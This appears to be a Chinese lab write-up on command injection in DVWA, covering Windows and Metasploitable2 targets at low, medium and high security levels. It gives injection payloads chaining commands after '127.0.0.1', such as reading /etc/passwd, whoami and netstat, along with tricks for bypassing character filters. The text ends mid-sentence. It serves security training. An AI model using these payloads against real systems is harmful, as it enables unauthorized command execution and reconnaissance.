DVWA之命令注入漏洞

命令注入


1.Windows：（WinServer2003–192.168.31.2的dvwa：
A;B 先A后B
A&B AB无制约关系
A|B 显示B的执行结果
A&&B A成功执行B
A||B A失败执行B
低安全级别：
看源码（windows系统默认发四个包，Linux系统默认是一直发包，所以得-c 4）

127.0.0.1&&dir（ping 127.0.0.1(自己)）

127.0.0.1| dir（只执行dir）
127.0.0.1|ipconfig

127.0.0.1| arp -a（arp映射表）

127.0.0.1|calc（打开了winSer2003的计算器）

127.0.0.1|regedit

127.0.0.1|netstat -ano

中级安全级别：
源码：

过滤掉了&&和；为空，不能用&&，但可用|
或者绕过过滤：比如&；&过滤后为&&
高级安全级别：

把输入分段后再拼接

过滤了一系列字符，但是由于后台工作人员的失误 | 的后面多个空格，所以|还是可以用
如127.0.0.1|ipconfig

Linux：（Metasploitable2–192.168.70.136）的dvwa：
命令：cat /etc/passwd, id, groups, cat /etc/group, whoami, pwd, uname -a, netstat -pantu, netstat -nr

低安全级别：
源码

127.0.0.1| cat /etc/passwd （查看passwd文件内容（纯文本文件））注意不是password
https://blog.csdn.net/qq_36838191/article/details/85032118
Linux系统中，用户的关键信息被存放在系统的/etc/passwd文件中，系统的每一个合法用户账号对应于该文件中的一行记录。这行记录定义了每个用户账号的属性。各个字段的顺序和含义如下：注册名：口令：用户标识号：组标识号：用户名：用户主目录：命令解释程序
Unix/Linux系统中，口令不再直接保存在passwd文件中，通常将passwd文件中的口令字段使用一个“x”来代替，将/etc /shadow作为真正的口令文件，用于保存包括个人口令在内的数据。当然shadow文件是不能被普通用户读取的，只有超级用户才有权读取。

127.0.0.1 | id

127.0.0.1 | groups

127.0.0.1 |cat /etc/group

127.0.0.1 |whoami

127.0.0.1 |pwd (当前路径)

127.0.0.1 |uname -a (系统版本)

127.0.0.1|netstat -pantu （已开通的服务和连接）

127.0.0.1|netstat -nr

中级安全级别：
源码：

过滤掉了&&和；为空，不能用&&，但可用|
或者绕过过滤：比如&；&过滤后为&&
高级安全级别：
把输入分段后再拼接

如果输入不是纯数字：